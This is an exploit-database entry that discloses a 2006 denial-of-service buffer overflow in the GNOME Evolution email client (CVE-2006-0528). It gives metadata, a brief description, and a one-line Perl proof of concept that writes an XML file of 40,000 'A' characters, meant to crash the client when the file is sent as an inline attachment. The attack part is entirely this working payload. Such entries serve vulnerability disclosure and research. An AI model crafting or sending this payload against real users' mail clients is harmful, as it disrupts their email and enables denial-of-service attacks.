GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow

Author: Mike Davis
type: dos
platform: linux
port: 
date_added: 2006-01-28  
date_updated: 2013-07-28  
verified: 1  
codes: CVE-2006-0528;OSVDB-22923  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 27145.txt  
source: https://www.securityfocus.com/bid/16408/info

GNOME Evolution email client is prone to a denial-of-service vulnerability when processing messages containing inline XML file attachments with excessively long strings.


perl -e 'printf "A"x40000' > evolution-dos-poc.xml